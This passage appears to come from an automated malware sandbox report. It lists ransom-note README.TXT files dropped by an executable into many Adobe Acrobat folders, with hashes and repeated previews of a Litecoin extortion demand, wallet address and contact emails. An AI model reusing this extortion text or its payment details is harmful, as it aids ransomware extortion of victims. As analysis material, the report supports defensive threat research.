                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-sl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
